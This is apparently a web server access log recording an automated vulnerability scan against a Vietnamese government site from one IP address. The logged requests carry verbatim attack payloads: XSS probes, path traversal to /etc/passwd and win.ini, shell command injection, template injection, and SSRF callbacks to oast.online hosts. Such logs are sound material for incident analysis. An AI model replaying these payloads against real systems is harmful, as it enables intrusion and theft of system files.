2023-10-13 09:51:06 103.153.214.94 GET /backend/admin/common/clearcache previousUrl=http://www.interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 636
2023-10-13 09:51:25 103.153.214.94 GET /wp-admin/admin-ajax.php action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 205
2023-10-13 09:51:29 103.153.214.94 GET /secure/QueryComponentRendererValue!Default.jspa assignee=user:admin 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 204
2023-10-13 09:51:32 103.153.214.94 GET /jira/secure/QueryComponentRendererValue!Default.jspa assignee=user:admin 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 207
2023-10-13 09:52:28 103.153.214.94 POST /os/mxperson - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 204
2023-10-13 09:52:31 103.153.214.94 POST /meaweb/os/mxperson - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 204
2023-10-13 09:56:16 103.153.214.94 GET /_next/server/pages-manifest.json - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 206
2023-10-13 09:57:56 103.153.214.94 POST /dfsms/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 205
2023-10-13 09:58:49 103.153.214.94 GET /a/b/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 11 0 212
2023-10-13 10:00:25 103.153.214.94 GET /proxy.stream origin=http://ckjv7uic8b6p3donsoogstz6nwibbzmoa.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205
2023-10-13 10:00:26 103.153.214.94 GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd#foo/development - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 11 0 209
2023-10-13 10:01:06 103.153.214.94 GET /external_content/retrieve/oembed endpoint=http://ckjv7uic8b6p3donsoog3ebx3z1oje18z.oast.online&url=foo 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 206
2023-10-13 10:02:32 103.153.214.94 GET /index.php/catalogsearch/advanced/result/ name=e 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 209
2023-10-13 10:04:00 103.153.214.94 GET /webGui/images/green-on.png/ path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 206
2023-10-13 10:04:00 103.153.214.94 POST /magmi/web/magmi_saveprofile.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 829
2023-10-13 10:04:03 103.153.214.94 POST /magmi/web/magmi_run.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 204
2023-10-13 10:04:05 103.153.214.94 GET /magmi/web/info.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 205
2023-10-13 10:10:06 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 208
2023-10-13 10:10:09 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/etc/f5-release 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 209
2023-10-13 10:10:11 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/config/bigip.license 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203
2023-10-13 10:10:15 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 205
2023-10-13 10:10:17 103.153.214.94 POST /tmui/locallb/workspace/fileSave.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 205
2023-10-13 10:10:19 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 204
2023-10-13 10:10:21 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 207
2023-10-13 10:10:37 103.153.214.94 GET / lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 677
2023-10-13 10:12:45 103.153.214.94 POST /EemAdminService/EemAdmin - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 206
2023-10-13 10:12:58 103.153.214.94 POST /CTCWebService/CTCWebServiceBean/ConfigServlet - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 207
2023-10-13 10:13:36 103.153.214.94 POST /AdminTools/querybuilder/logon framework 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 0 2 209
2023-10-13 10:17:20 103.153.214.94 GET / Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 209
2023-10-13 10:18:06 103.153.214.94 POST /session/create - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 210
2023-10-13 10:18:16 103.153.214.94 GET /linuxki/experimental/vis/kivis.php type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 209
2023-10-13 10:18:31 103.153.214.94 POST /account/index.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 208
2023-10-13 10:18:33 103.153.214.94 POST /opensis/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 204
2023-10-13 10:18:35 103.153.214.94 POST /index.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 204
2023-10-13 10:18:44 103.153.214.94 GET /PolicyMgmt/policyDetailsCard.do poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 204
2023-10-13 10:19:36 103.153.214.94 GET /zimlet/com_zimbra_webex/httpPost.jsp companyId=http://ckjv7uic8b6p3donsoogk6qssmfq1op5c.oast.online%23 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 209
2023-10-13 10:20:17 103.153.214.94 GET /metrics/v1/mbeans - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 204
2023-10-13 10:21:09 103.153.214.94 POST /cgi-bin/libagent.cgi type=J 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 206
2023-10-13 10:21:31 103.153.214.94 POST /api/jsonws/invoke - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 https://bcvt.kontum.gov.vn/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData 404 0 2 219
2023-10-13 10:21:33 103.153.214.94 POST /api/jsonws/invoke - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData 404 0 2 207
2023-10-13 10:21:38 103.153.214.94 GET /www/delivery/afr.php refresh=10000&")',10000000);alert(1337);setTimeout('alert(" 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 205
2023-10-13 10:21:52 103.153.214.94 GET / IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 208
2023-10-13 10:22:56 103.153.214.94 POST /menu/stapp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 210
2023-10-13 10:27:56 103.153.214.94 POST /pcidss/report type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 211
2023-10-13 10:27:58 103.153.214.94 GET /menu/ss sid=nsroot&username=nsroot&force_setup=1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 208
2023-10-13 10:28:00 103.153.214.94 GET /menu/neo - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 208
2023-10-13 10:28:02 103.153.214.94 GET /menu/stc - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 204
2023-10-13 10:31:52 103.153.214.94 GET /menu/guiw nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 208
2023-10-13 10:33:01 103.153.214.94 GET /jsp/help-sb-download.jsp sbFileName=../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 206
2023-10-13 10:33:18 103.153.214.94 GET /pandora_console/attachment/pandora_chat.log.json.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 209
2023-10-13 10:33:20 103.153.214.94 GET /webmail/ color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 204
2023-10-13 10:33:49 103.153.214.94 POST /cgi-bin/mainfunction.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 207
2023-10-13 10:33:52 103.153.214.94 GET /index.php page_slug=../../../../../etc/passwd%00 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 203
2023-10-13 10:34:26 103.153.214.94 GET /index.php app=main&inc=core_auth&route=login 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 207
2023-10-13 10:38:24 103.153.214.94 GET /css/eonweb.css - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 210
2023-10-13 10:39:36 103.153.214.94 GET /graph_realtime.php action=init 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 207
2023-10-13 10:39:43 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 465
2023-10-13 10:39:44 103.153.214.94 GET /wp-admin/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 204
2023-10-13 10:40:09 103.153.214.94 GET / author=1 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 206
2023-10-13 10:40:11 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 206
2023-10-13 10:40:20 103.153.214.94 GET /XmlPeek.aspx dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 206
2023-10-13 10:41:36 103.153.214.94 GET /index.php v=d&p=%22;alert(document.domain);%22 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 205
2023-10-13 10:43:06 103.153.214.94 GET /version.web - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 207
2023-10-13 10:43:31 103.153.214.94 GET /cgi-bin/weblogin.cgi username=admin';cat+/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 205
2023-10-13 10:46:11 103.153.214.94 GET /admingui/version/serverTasksGeneral serverTasksGeneral.GeneralWebserverTabs.TabHref=2 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 0 2 218
2023-10-13 10:46:13 103.153.214.94 GET /admingui/version/serverConfigurationsGeneral serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 0 2 208
2023-10-13 10:52:16 103.153.214.94 GET /plugins/servlet/svnwebclient/changedResource.jsp url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 213
2023-10-13 10:52:16 103.153.214.94 GET /plugins/servlet/svnwebclient/commitGraph.jsp %27)%3Balert(%22XSS 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205
2023-10-13 10:52:18 103.153.214.94 GET /plugins/servlet/svnwebclient/commitGraph.jsp url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 204
2023-10-13 10:52:19 103.153.214.94 GET /plugins/servlet/svnwebclient/error.jsp errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 208
2023-10-13 10:52:19 103.153.214.94 GET /plugins/servlet/svnwebclient/statsItem.jsp url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 204
2023-10-13 10:52:36 103.153.214.94 POST /getcfg.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 204
2023-10-13 10:53:17 103.153.214.94 GET /settings.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 208
2023-10-13 10:53:21 103.153.214.94 POST /graphql - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 207
2023-10-13 10:53:41 103.153.214.94 GET /index.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205
2023-10-13 10:54:24 103.153.214.94 POST /webtools/control/xmlrpc - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 207
2023-10-13 10:55:29 103.153.214.94 GET /actions/seomatic/meta-container/meta-link-container/ uri={{228*'98'}} 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 208
2023-10-13 10:55:31 103.153.214.94 GET /actions/seomatic/meta-container/all-meta-containers uri={{228*'98'}} 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 204
2023-10-13 10:57:52 103.153.214.94 POST /upload - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 206
2023-10-13 10:59:56 103.153.214.94 POST /storfs-asup - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 207
2023-10-13 11:01:26 103.153.214.94 POST /upload - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 204
2023-10-13 11:02:05 103.153.214.94 GET /info.html - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 https://bcvt.kontum.gov.vn/info.html 200 0 0 206
2023-10-13 11:02:48 103.153.214.94 GET /info.html - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 https://bcvt.kontum.gov.vn/info.html 200 0 0 205
2023-10-13 11:04:16 103.153.214.94 GET /info.html - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 https://bcvt.kontum.gov.vn/info.html 200 0 0 208
2023-10-13 11:04:18 103.153.214.94 GET /cgi/cgi_i_filter.js _tn={{trimprefix(base64_decode(httoken), 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F https://bcvt.kontum.gov.vn/info.html 200 0 0 204
2023-10-13 11:04:57 103.153.214.94 GET /cache/backup/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 206
2023-10-13 11:12:37 103.153.214.94 GET /cgi-bin/luci/site_access/ url=%22%20onfocus=alert(document.domain)%20autofocus=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 207
2023-10-13 11:13:15 103.153.214.94 GET /ACSServer/DownloadFileServlet show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 208
2023-10-13 11:13:17 103.153.214.94 GET /ACSServer/DownloadFileServlet show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 204
2023-10-13 11:13:21 103.153.214.94 GET /ACSServer/WebServlet act=getMapImg_acs2&filename=../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 205
2023-10-13 11:13:23 103.153.214.94 GET /ACSServer/WebServlet act=getMapImg_acs2&filename=../../../../../../../windows/win.ini 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 204
2023-10-13 11:13:43 103.153.214.94 POST /apply_sec.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 205
2023-10-13 11:14:39 103.153.214.94 POST /apply_sec.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 811
2023-10-13 11:14:41 103.153.214.94 POST /apply_sec.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 203
2023-10-13 11:16:02 103.153.214.94 POST /cgi-bin/readycloud_control.cgi 1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 208
2023-10-13 11:20:09 103.153.214.94 POST /cgi-bin/mt/mt-xmlrpc.cgi - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 210
2023-10-13 11:20:25 103.153.214.94 POST /auth/realms/master/clients-registrations/default - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 208
